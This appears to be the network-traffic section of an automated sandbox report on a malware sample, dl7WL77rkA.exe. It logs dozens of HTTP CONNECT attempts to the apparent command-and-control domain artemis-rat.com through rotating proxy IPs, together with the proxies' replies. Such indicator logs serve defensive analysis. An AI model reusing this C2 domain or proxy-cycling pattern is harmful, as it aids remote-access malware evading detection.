                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            777192.168.2.552143181.12.80.21120003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.584666967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            778192.168.2.54985637.32.98.16089983876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.586561918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.701914072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702380896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.702507019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            779192.168.2.552243159.223.166.21455373876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.587518930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.201873064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            780192.168.2.552023223.112.53.210253876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.590306044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.454183102 CET34INHTTP/1.1 503 Service Unavailable


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            781192.168.2.552220181.78.73.739993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.595635891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.201931000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.092842102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.702281952 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.948101044 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            782192.168.2.552374137.184.142.374433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.598787069 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            783192.168.2.552266104.16.226.6803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.599039078 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.753279924 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            784192.168.2.55151043.255.113.23280803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.601114035 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            785192.168.2.552376137.184.142.374433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.601330042 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            786192.168.2.552273185.162.229.127803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.615199089 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.769377947 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            787192.168.2.55216291.202.230.21980803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.629513979 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            788192.168.2.552194163.172.165.36163793876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.630141973 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.704706907 CET | 536 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            789192.168.2.551520148.72.215.79472023876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.630142927 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.811131001 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            790192.168.2.55153791.201.240.8456783876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.630357027 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
791192.168.2.551870199.58.185.941453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.634901047 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
792192.168.2.552377137.184.142.374433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.655953884 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
793192.168.2.552291104.18.251.208803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.659065962 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.813730955 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
794192.168.2.552195147.75.34.85100073876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.659070015 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.965341091 CET | 65 | IN | HTTP/1.1 200 Connection Established
Proxy-Agent: Zscaler/6.3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
795192.168.2.55217037.235.48.19803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.661433935 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
796192.168.2.55225298.162.25.4316543876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.665117979 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
797192.168.2.55221745.128.133.24110803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.665653944 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
798192.168.2.552296162.159.242.62803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.666517019 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.827595949 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:40 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
799192.168.2.552200219.243.212.11884433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.676711082 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.004148006 CET | 22 | IN | HTTP/1.1 502 ERROR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
800192.168.2.552231196.20.125.14980833876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.676824093 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
801192.168.2.55225838.162.3.10931283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.697005987 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.166714907 CET | 111 | IN | HTTP/1.1 407 Proxy Authentication Required
Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
802192.168.2.552229147.75.34.85100113876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.708674908 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.009274960 CET | 65 | IN | HTTP/1.1 200 Connection Established
Proxy-Agent: Zscaler/6.3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
803192.168.2.5522043.37.125.7631283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.708739996 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.029081106 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:40 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
804192.168.2.552171118.69.233.16580803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.709196091 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.592356920 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.266571045 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
805192.168.2.55218045.11.95.16550383876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.709295988 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
806192.168.2.549883148.66.130.53239983876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.709391117 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.904828072 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
807192.168.2.549971158.51.210.7577773876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.709460974 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
808192.168.2.55168351.222.241.157517183876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.709461927 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.904815912 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.905422926 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.999305010 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
809192.168.2.552172138.36.150.2610803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.709570885 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
810192.168.2.55223495.140.124.16110803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.709671021 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
811192.168.2.552280107.180.88.173445683876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:40.711736917 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


